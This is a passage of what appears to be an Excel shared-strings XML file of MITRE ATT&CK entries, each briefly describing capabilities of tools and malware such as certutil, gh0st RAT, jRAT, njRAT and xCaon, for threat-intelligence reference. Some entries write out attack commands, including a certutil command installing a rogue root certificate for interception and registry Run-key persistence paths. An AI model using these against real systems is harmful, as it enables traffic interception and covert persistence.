    <t>[ccf32](https://attack.mitre.org/software/S1043) can determine the local time on targeted machines.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[ccf32](https://attack.mitre.org/software/S1043) has used `cmd.exe` for archiving data and deleting files.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) has been used to decode binaries hidden inside certificate files as Base64 information.(Citation: Malwarebytes Targeted Attack against Saudi Arabia)</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) can be used to download files from a given URL.(Citation: TechNet Certutil)(Citation: LOLBAS Certutil)</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) can be used to install browser root certificates as a precursor to performing [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) between connections to banking websites. Example command: &lt;code&gt;certutil -addstore -f -user ROOT ProgramData\cert512121.der&lt;/code&gt;.(Citation: Palo Alto Retefe)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to delete files from the file system.(Citation: TechNet Del)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to find files and directories with native functionality such as &lt;code&gt;dir&lt;/code&gt; commands.(Citation: TechNet Dir)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to copy files to/from a remotely connected external system.(Citation: TechNet Copy)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to copy files to/from a remotely connected internal system.(Citation: TechNet Copy)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) can be used to find information about the operating system.(Citation: TechNet Dir)</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) is used to execute programs and other actions at the command-line interface.(Citation: TechNet Cmd)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to list the directories on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to download files to the compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to list running processes on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to detect anti-virus products and processes on a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to gather information on installed applications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to base64 encode C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to AES encrypt C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the system volume information of a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to identify the MAC address of a compromised host.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[down_new](https://attack.mitre.org/software/S0472) has the ability to use HTTP in C2 communications.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on user accounts within a domain.(Citation: TechNet Dsquery)</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on permission groups within a domain.(Citation: TechNet Dsquery)</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) can be used to gather information on domain trusts with &lt;code&gt;dsquery * -filter "(objectClass=trustedDomain)" -attr *&lt;/code&gt;.(Citation: Harmj0y Domain Trusts)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to collect data from local file systems.(Citation: Red Canary 2021 Threat Detection Report March 2021)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to copy files from a given URL.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to copy files to/from a remote share.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can use Volume Shadow Copy to copy locked files such as ntds.dit.(Citation: LOLBAS Esentutl)(Citation: Cary Esentutl)</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) can be used to read and write alternate data streams.(Citation: LOLBAS Esentutl)</t>
  </si>
  <si>
    <t>[ftp](https://attack.mitre.org/software/S0095) may be used to exfiltrate data separate from the main command and control protocol.(Citation: Microsoft FTP)(Citation: Linux FTP)</t>
  </si>
  <si>
    <t>[ftp](https://attack.mitre.org/software/S0095) may be abused by adversaries to transfer tools or files from an external system into a compromised environment.(Citation: Microsoft FTP)(Citation: Linux FTP)</t>
  </si>
  <si>
    <t>[ftp](https://attack.mitre.org/software/S0095) may be abused by adversaries to transfer tools or files between systems within a compromised environment.(Citation: Microsoft FTP)(Citation: Linux FTP)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is able to wipe event logs.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is able to open a remote shell to execute commands.(Citation: FireEye Hacking Team)(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>A [gh0st RAT](https://attack.mitre.org/software/S0032) variant has used DLL side-loading.(Citation: Arbor Musical Chairs Feb 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has decrypted and loaded the [gh0st RAT](https://attack.mitre.org/software/S0032) DLL into memory, once the initial dropper executable is launched.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has encrypted TCP communications to evade detection.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) operators have used dynamic DNS to mask the true location of their C2 behind rapidly changing IP addresses.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has the capability to to delete files.(Citation: FireEye Hacking Team)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can download files to the victim’s machine.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has a keylogger.(Citation: Alintanahin 2014)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has altered the InstallTime subkey.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used the `InterlockedExchange`, `SeShutdownPrivilege`, and `ExitWindowsEx` Windows API functions.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used an encrypted protocol within TCP segments to communicate with the C2.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has the capability to list processes.(Citation: FireEye Hacking Team)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can inject malicious code into process created by the “Command_Create&amp;Inject” function.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has checked for the existence of a Service key to determine if it has already been installed on the system.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has added a Registry Run key to establish persistence.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>A [gh0st RAT](https://attack.mitre.org/software/S0032) variant has used rundll32 for execution.(Citation: Arbor Musical Chairs Feb 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can capture the victim’s screen remotely.(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can execute its service if the Service key exists. If the key does not exist, [gh0st RAT](https://attack.mitre.org/software/S0032) will create and run the service.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can load DLLs into memory.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has used Zlib to compress C2 communications data before encrypting it.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) uses RC4 and XOR to encrypt C2 traffic.(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) has gathered system architecture, processor, OS configuration, and installed hardware information.(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) can create a new service to establish persistence.(Citation: Nccgroup Gh0st April 2018)(Citation: Gh0stRAT ATT March 2019)</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) can dump LSA secrets.(Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) can dump Windows password hashes from the SAM.(Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) provides command-line access to the compromised system.(Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) installs itself as a service for persistence.(Citation: Dell Lateral Movement)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) encrypts C2 content with XOR using a single byte, 0x12.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) opens cmd.exe on the victim.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) will zip up the /Library/Keychains directory before exfiltrating it.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) prompts the user for their credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) saves itself with a leading "." so that it's hidden from users by default.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) collects the keychains on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) lists the current processes running.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) adds an entry to the rc.common file for persistence.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) will look for the current IP address.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>[ifconfig](https://attack.mitre.org/software/S0101) can be used to display adapter configuration on Unix systems, including information for TCP/IP, DNS, and DHCP.</t>
  </si>
  <si>
    <t>[ipconfig](https://attack.mitre.org/software/S0100) can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP.</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture microphone recordings.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture clipboard data.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture passwords from common chat applications such as MSN Messenger, AOL, Instant Messenger, and and Google Talk.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can capture passwords from common web browsers such as Internet Explorer, Google Chrome, and Firefox.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has a function to delete files from the victim’s machine.(Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can browse file systems.(Citation: Kaspersky Adwind Feb 2016)(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can download and execute files.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t xml:space="preserve">[jRAT](https://attack.mitre.org/software/S0283) has been distributed as HTA files with JScript.(Citation: Kaspersky Adwind Feb 2016)	</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to log keystrokes from the victim’s machine, both offline and online.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283)’s Java payload is encrypted with AES.(Citation: jRAT Symantec Aug 2018) Additionally, backdoor files are encrypted using DES as a stream cipher. Later variants of [jRAT](https://attack.mitre.org/software/S0283) also incorporated AV evasion methods such as Java bytecode obfuscation via the commercial Allatori obfuscation tool.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can map UPnP ports.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can steal keys for VPNs and cryptocurrency wallets.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can query and kill system processes.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can serve as a SOCKS proxy server.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can support RDP control.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can be configured to reconnect at certain intervals.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to take screenshots of the victim’s machine.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list security software, such as by using WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) payloads have been packed.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list and manage startup entries.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) collects information about the OS (version, build type, install date) as well as system up-time upon receiving a connection from a backdoor.(Citation: Symantec Frutas Feb 2013)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can gather victim internal and external IPs.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list network connections.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) can list local services.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has the capability to capture video from a webcam.(Citation: jRAT Symantec Aug 2018)(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[jRAT](https://attack.mitre.org/software/S0283) has been distributed as HTA files with VBScript.(Citation: Kaspersky Adwind Feb 2016)	</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) has command line access.(Citation: Kaspersky Adwind Feb 2016)</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) uses WMIC to identify anti-virus products installed on the victim’s machine and to obtain firewall details.(Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `osascript` to call itself via the `do shell script` command in the [Launch Agent](https://attack.mitre.org/techniques/T1543/001) `.plist` file.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has searched for the Activity Monitor process in the System Events process list and kills the process if running. [macOS.OSAMiner](https://attack.mitre.org/software/S1048) also searches the operating system's `install.log` for apps matching its hardcoded list, killing all matching process names.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has embedded [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008) within another run-only [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008).(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `curl` to download a [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008) from a public facing adversary-controlled webpage. </t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has placed a [Stripped Payloads](https://attack.mitre.org/techniques/T1027/008) with a `plist` extension in the [Launch Agent](https://attack.mitre.org/techniques/T1543/001)'s folder. (Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `launchctl` to restart the [Launch Agent](https://attack.mitre.org/techniques/T1543/001).(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used `ps ax | grep &lt;name&gt; | grep -v grep | ...` and `ps ax | grep -E...` to conduct process discovery.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) has used run-only Applescripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to remove human readable indicators to evade detection.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) can parse the output of the native `system_profiler` tool to determine if the machine is running with 4 cores.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>[macOS.OSAMiner](https://attack.mitre.org/software/S1048) can gather the device serial number and has checked to ensure there is enough disk space using the Unix utility `df`.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>[meek](https://attack.mitre.org/software/S0175) uses Domain Fronting to disguise the destination of network traffic as another server that is hosted in the same Content Delivery Network (CDN) as the intended destination.</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) can be used to discover local NetBIOS domain names.</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) can be used to discover current NetBIOS sessions.</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to disable local firewall settings.(Citation: TechNet Netsh)(Citation: TechNet Netsh Firewall)</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed.(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to set up a proxy tunnel to allow remote host access to an infected host.(Citation: Securelist fileless attacks Feb 2017)</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) can be used to discover system firewall settings.(Citation: TechNet Netsh)(Citation: TechNet Netsh Firewall)</t>
  </si>
  <si>
    <t>[netstat](https://attack.mitre.org/software/S0104) can be used to enumerate local network connections, including active TCP connections and other network statistics.(Citation: TechNet Netstat)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) gathers information about opened windows during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is capable of manipulating and deleting registry keys, including those used for persistence.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used AutoIt to compile the payload and main script into a single executable after delivery.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has a module that steals passwords saved in victim web browsers.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can collect data from a local system.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has modified the Windows firewall to allow itself to communicate through the firewall.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[njRAT](https://attack.mitre.org/software/S0385) has used HTTP to receive stolen information from the infected machine.(Citation: Trend Micro njRAT 2018)	</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used a fast flux DNS for C2 IP resolution.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is capable of deleting files.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can browse file systems using a file manager module.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can download files to the victim’s machine.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is capable of logging keystrokes.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can create, delete, or modify a specified Registry key or value.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used the ShellExecute() function within a script.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used port 1177 for HTTP C2 communications.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has included a base64 encoded executable.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) will attempt to detect if the victim system has a camera during the initial infection. [njRAT](https://attack.mitre.org/software/S0385) can also detect any removable drives connected to the system.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has executed PowerShell commands via auto-run registry key persistence.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can search a list of running processes for Tr.exe.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can read specific registry values.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has added persistence via the Registry key &lt;code&gt;HKCU\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt; and dropped a shortcut in &lt;code&gt;%STARTUP%&lt;/code&gt;.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has a module for performing remote desktop access.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can identify remote hosts on connected networks.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can be configured to spread via removable drives.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can capture screenshots of the victim’s machines.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) uses Base64 encoding for C2 traffic.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) enumerates the victim operating system and computer name during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) enumerates the current user during the initial infection.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can access the victim's webcam.(Citation: Fidelis njRAT June 2013)(Citation: Citizen Lab Group5)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) has used HTTP for C2 communications.(Citation: Trend Micro njRAT 2018)</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) can launch a command shell interface for executing commands.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>If an initial connectivity check fails, [pngdowner](https://attack.mitre.org/software/S0067) attempts to extract proxy details and credentials from Windows Protected Storage and from the IE Credentials Store. This allows the adversary to use the proxy credentials for subsequent requests if they enable outbound HTTP access.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) deletes content from C2 communications that was saved to the user's temporary directory.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) uses HTTP for command and control.(Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>[pwdump](https://attack.mitre.org/software/S0006) can be used to dump credentials from the SAM.(Citation: Wikipedia pwdump)</t>
  </si>
  <si>
    <t>[route](https://attack.mitre.org/software/S0103) can be used to discover routing configuration information.</t>
  </si>
  <si>
    <t>[schtasks](https://attack.mitre.org/software/S0111) is used to schedule tasks on a Windows system to run at a specific date and time.(Citation: TechNet Schtasks)</t>
  </si>
  <si>
    <t>[spwebmember](https://attack.mitre.org/software/S0227) is used to enumerate and dump information from Microsoft SharePoint.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[sqlmap](https://attack.mitre.org/software/S0225) can be used to automate exploitation of SQL injection vulnerabilities.(Citation: sqlmap Introduction)</t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has added persistence via the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load&lt;/code&gt; which causes the malware to run each time any user logs in.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has uploaded files from victims' machines.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[xCaon](https://attack.mitre.org/software/S0653) has decoded strings from the C2 server before executing commands.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has a command to download files to the victim's machine.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[xCaon](https://attack.mitre.org/software/S0653) has leveraged native OS function calls to retrieve  victim's network adapter's  information using GetAdapterInfo() API.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has checked for the existence of Kaspersky antivirus software on the system.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has used Base64 to encode its C2 traffic.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[xCaon](https://attack.mitre.org/software/S0653) has encrypted data sent to the C2 server using a XOR key.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has used the GetAdaptersInfo() API call to get the victim's MAC address.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[xCaon](https://attack.mitre.org/software/S0653) has communicated with the C2 server by sending POST requests over HTTP.(Citation: Checkpoint IndigoZebra July 2021) </t>
  </si>
  <si>
    <t>[xCaon](https://attack.mitre.org/software/S0653) has a command to start an interactive shell.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[xCmd](https://attack.mitre.org/software/S0123) can be used to execute binaries on remote systems by creating and starting a service.(Citation: xCmd)</t>
  </si>
  <si>
